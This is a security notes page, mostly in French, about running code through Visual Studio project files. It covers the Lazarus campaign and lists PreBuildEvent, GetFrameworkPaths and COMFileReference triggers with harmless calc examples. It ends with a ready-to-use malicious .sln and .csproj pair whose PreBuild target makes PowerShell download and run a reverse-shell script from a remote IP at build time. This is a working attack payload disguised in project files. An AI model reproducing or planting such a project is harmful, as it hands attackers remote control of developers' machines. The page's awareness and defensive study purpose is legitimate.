Aller au contenu

VisualStudio

1
2
3
4
5
Using code projects for phishing attacks is not a new concept. In early 2021, the Lazarus APT group employed a specific attack technique in their campaign targeting security researchers. They embedded malicious event commands within Visual Studio project files, allowing the execution of harmful code when the project is compiled, as detailed in: [New campaign targeting security researchers](https://blog.google/threat-analysis-group/new-campaign-targeting-security-researchers/)

This incident has once again brought the security of Visual Studio into the public eye. However, it is important to note that Visual Studio is not the only product with such risks. JetBrains' IDEs, VSCode, and other text editors also face similar vulnerabilities when opening unsafe projects. As a response, these products have introduced trust zone mechanisms that disable certain risky functionalities in untrusted environments, aiming to protect their users.

In this repository, we present a new exploitation technique for Visual Studio projects **(Microsoft consider it is not a security issue)** and provide a proof of concept. Our intention is to raise awareness about the potential risks involved and empower individuals to avoid being hacked.

Here are some publicly disclosed methods for exploiting Visual Studio:

PreBuildEvent: Executes arbitrary commands before project compilation.

1
2
3
4
5
<PreBuildEvent>
    <Command>
    cmd /c calc
    </Command>
</PreBuildEvent>

GetFrameworkPaths Target: Triggered when viewing code.

1
2
3
<Target Name="GetFrameworkPaths">
    <Exec Command="calc.exe"/>
</Target>

COMFileReference: Triggered when loading TypeLib during project opening.

1
2
3
<COMFileReference Include="files\helpstringdll.tlb">
     <EmbedInteropTypes>True</EmbedInteropTypes>
</COMFileReference>

Exemple d'exploit avec PreBuildEvent :

Visual.sln :

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio Version 17
VisualStudioVersion = 17.7.34031.279
MinimumVisualStudioVersion = 10.0.40219.1
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Visual", "Visual.csproj", "{A408C004-8817-4960-BF22-4E7AB8AA1974}"
EndProject
Global
    GlobalSection(SolutionConfigurationPlatforms) = preSolution
        Debug|Any CPU = Debug|Any CPU
        Release|Any CPU = Release|Any CPU
    EndGlobalSection
    GlobalSection(ProjectConfigurationPlatforms) = postSolution
        {A408C004-8817-4960-BF22-4E7AB8AA1974}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
        {A408C004-8817-4960-BF22-4E7AB8AA1974}.Debug|Any CPU.Build.0 = Debug|Any CPU
        {A408C004-8817-4960-BF22-4E7AB8AA1974}.Release|Any CPU.ActiveCfg = Release|Any CPU
        {A408C004-8817-4960-BF22-4E7AB8AA1974}.Release|Any CPU.Build.0 = Release|Any CPU
    EndGlobalSection
    GlobalSection(SolutionProperties) = preSolution
        HideSolutionNode = FALSE
    EndGlobalSection
    GlobalSection(ExtensibilityGlobals) = postSolution
        SolutionGuid = {D24BD630-7BA0-46EB-A66C-8723E99703FC}
    EndGlobalSection
EndGlobal

Ainsi qu'un fichier Visual.csproj :

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
<Project Sdk="Microsoft.NET.Sdk">

  <PropertyGroup>
    <OutputType>Exe</OutputType>
    <TargetFramework>net6.0</TargetFramework>
    <ImplicitUsings>enable</ImplicitUsings>
    <Nullable>enable</Nullable>
  </PropertyGroup>
    <Target Name="PreBuild" BeforeTargets="PreBuildEvent">
        <Exec Command="powershell IEX (New-Object Net.WebClient).DownloadString('http://10.10.16.26:8000/revshell.ps1')" />
    </Target>

</Project>

Juste avant le début du build du projet, la commande présente dans le fichier .csproj sera exécutée (le téléchargement et l'exécution d'un reverse-shell en powershell).